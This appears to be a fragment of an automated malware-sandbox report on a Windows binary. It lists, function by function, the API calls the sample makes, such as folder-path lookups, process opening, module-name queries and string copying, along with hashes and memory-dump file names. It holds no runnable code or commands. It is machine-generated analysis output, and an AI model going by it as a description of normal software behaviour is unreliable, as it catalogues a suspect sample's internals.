                                • API String ID: 818526691-0
                                • Opcode ID: 82f54a18b62bf205828ce9dec4da694f616e413663cf56767be3a7e5421e19e6
                                • Instruction ID: a1f42df98a5dc552625ceb9855cccf845c417f1386fb65fbb99250c78b936182
                                • Opcode Fuzzy Hash: 82f54a18b62bf205828ce9dec4da694f616e413663cf56767be3a7e5421e19e6
                                • Instruction Fuzzy Hash: 1B518171A1010CAFDB65EF54EC46EFE33B9AF58300F444898FA0597295EB74EE849B90
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 01011FDF, 01011FF5, 010120B7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: 444f327a5d150f739d3aa00bf14bf352cd05c938e05c7a32e70a45ca0a48b619
                                • Instruction ID: 117bfb67891e17ef1835cae2a46c2a9b91c2425facb0b5f20b72be98376d6b48
                                • Opcode Fuzzy Hash: 444f327a5d150f739d3aa00bf14bf352cd05c938e05c7a32e70a45ca0a48b619
                                • Instruction Fuzzy Hash: 5D217E355102898FD721DA79C4447DDF7A7DF80361FA44296E8984B28BE33A190AC796
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0100EBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100EBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 0100EBF1
                                • lstrcat.KERNEL32(?,00D6ED00), ref: 0100EC0C
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: ff3866f69346d7f4e4b05dd3d9d94301f78f5fd6e4387fe26e5a7c8f242398a3
                                • Instruction ID: d4fa0820fec6cbd60bd4cd08bdad3f8884202409dfd635a82aae7dc4bc866ff8
                                • Opcode Fuzzy Hash: ff3866f69346d7f4e4b05dd3d9d94301f78f5fd6e4387fe26e5a7c8f242398a3
                                • Instruction Fuzzy Hash: 66317471A1011CABDB71EF64EC45BEE77B4AF58300F1014A8FB16A7290DB789E849B90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0101A3D0,000000FF), ref: 01012B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 01012B96
                                • GetLocalTime.KERNEL32(?,?,00000000,0101A3D0,000000FF), ref: 01012BA2
                                • wsprintfA.USER32 ref: 01012BCE
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 32dd192bd288898f25d12d7f1e80a98f46a5161ca3d80a585828251423158a2d
                                • Instruction ID: 29cba3c68e6655fcdac5e17c502ddc10a3e1e9bb324907068f569cd9a4d8e909
                                • Opcode Fuzzy Hash: 32dd192bd288898f25d12d7f1e80a98f46a5161ca3d80a585828251423158a2d
                                • Instruction Fuzzy Hash: 5D012DB2904128BBCB249FC9AD49FBEB7BCFB4CA11F00411AF605A2284E67C5540C7B5
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 01014492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 010144AD
                                • CloseHandle.KERNEL32(00000000), ref: 010144B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 010144E7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: c7c57761491536bfec0fa7509cbc2f16765c548e2cb7363f0f498c7fe1b655f4
                                • Instruction ID: 83563d103c887865707686bcecdafa8cd4e0abfe27185e1560d25dc5c8133f54
                                • Opcode Fuzzy Hash: c7c57761491536bfec0fa7509cbc2f16765c548e2cb7363f0f498c7fe1b655f4
                                • Instruction Fuzzy Hash: 2DF0C8B09416253BFB319F78AC4DBEA7AE8AF14704F000590EB89D7184DBB889C48794
                                APIs
                                • __getptd.LIBCMT ref: 01018FDD
                                  • Part of subcall function 010187FF: __amsg_exit.LIBCMT ref: 0101880F
                                • __getptd.LIBCMT ref: 01018FF4
                                • __amsg_exit.LIBCMT ref: 01019002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 01019026
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 0c14f3ae60d2212264a3c3b092b949144fb9eb3a55ddd940a83b26d0a4f0a4f0
                                • Instruction ID: 4044c6e5c5d5b7c73a5361f678f7e2b56fed8fb2a845973131236452d8828686
                                • Opcode Fuzzy Hash: 0c14f3ae60d2212264a3c3b092b949144fb9eb3a55ddd940a83b26d0a4f0a4f0
                                • Instruction Fuzzy Hash: 2DF090329446219FDB62BB7C980179D37A07F20724F24815EE6C4AA1C8DF6C9600DA99
                                APIs
                                • lstrlen.KERNEL32(------,00FF5BEB), ref: 0101731B
                                • lstrcpy.KERNEL32(00000000), ref: 0101733F
                                • lstrcat.KERNEL32(?,------), ref: 01017349
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: 25c20b06c2c1af7e38d5bee2944c358c63b9e61ae0ba5cfb18c31893968f52e4
                                • Instruction ID: c2646f2ede978f548747470b04d1b9779dac83602edad73a6382fd5a83ef3a28
                                • Opcode Fuzzy Hash: 25c20b06c2c1af7e38d5bee2944c358c63b9e61ae0ba5cfb18c31893968f52e4
                                • Instruction Fuzzy Hash: 0DF030745003029FEB749F39E84D926BBF8EF44600718985DA8DAC7218E738D440CB10
                                APIs
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1557
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1579
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF159B
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 01003422
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 01003471
                                • lstrcpy.KERNEL32(00000000,?), ref: 01003497
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 7e6986d309e17f6fbc98237ba720714069940de55eca91f11c410ae9a1df7040
                                • Instruction ID: e816acbff104af26641a498f922ef55964f0153c12092538580b6fa38802a7b8
                                • Opcode Fuzzy Hash: 7e6986d309e17f6fbc98237ba720714069940de55eca91f11c410ae9a1df7040
                                • Instruction Fuzzy Hash: B812F974A012118FEB6ACF1DD558A25BBE4BF44318F29C0EED5499F3A2D772E842CB40
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 01007C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 01007CAF
                                  • Part of subcall function 01007D40: std::_Xinvalid_argument.LIBCPMT ref: 01007D58
                                  • Part of subcall function 01007D40: std::_Xinvalid_argument.LIBCPMT ref: 01007D76
                                  • Part of subcall function 01007D40: std::_Xinvalid_argument.LIBCPMT ref: 01007D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: d84f21dffa9b440d8f3995165d215b6b996480e3defc4ac55117082d4b9ba743
                                • Instruction ID: e3018aa9738a39cfde955db63ef214d284fef17302dcfd499f52bd83d86b160a
                                • Opcode Fuzzy Hash: d84f21dffa9b440d8f3995165d215b6b996480e3defc4ac55117082d4b9ba743
                                • Instruction Fuzzy Hash: 1D310A723002188BF3269D6CE880DAAF7E5DF91660F24462FE6C1CB6C1C775BC4183A5
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00FF6F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00FF6F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: 066bb044216a9e03a3f486c4897868180c25cca838b0763c255739d3012e9b6e
                                • Instruction ID: 707cab696438129ef1e683604d626c998ae7bacb378715215152ee6eb965e2a8
                                • Opcode Fuzzy Hash: 066bb044216a9e03a3f486c4897868180c25cca838b0763c255739d3012e9b6e
                                • Instruction Fuzzy Hash: E0218170A007059BDB208F24DC85BBA73A8EF40704F444968FA46CB6D5FB79E945D750
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 010115A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 010115D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 01011611
                                • lstrcpy.KERNEL32(00000000,?), ref: 01011649
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 88560b037871d145349a856c5c5897e833c1b5f6967ac69f43d590788971da5c
                                • Instruction ID: f25683b4907401eaa0dbd553cf81c1423dcd588ebddc64500d7e99451eeabdb7
                                • Opcode Fuzzy Hash: 88560b037871d145349a856c5c5897e833c1b5f6967ac69f43d590788971da5c
                                • Instruction Fuzzy Hash: BA210C74601B029BEB78DF7AD858A27BBF8AF44700B04491CE6D6C7A44DB78E841DB90
                                APIs
                                  • Part of subcall function 00FF1610: lstrcpy.KERNEL32(00000000), ref: 00FF162D
                                  • Part of subcall function 00FF1610: lstrcpy.KERNEL32(00000000,?), ref: 00FF164F
                                  • Part of subcall function 00FF1610: lstrcpy.KERNEL32(00000000,?), ref: 00FF1671
                                  • Part of subcall function 00FF1610: lstrcpy.KERNEL32(00000000,?), ref: 00FF1693
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1557
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1579
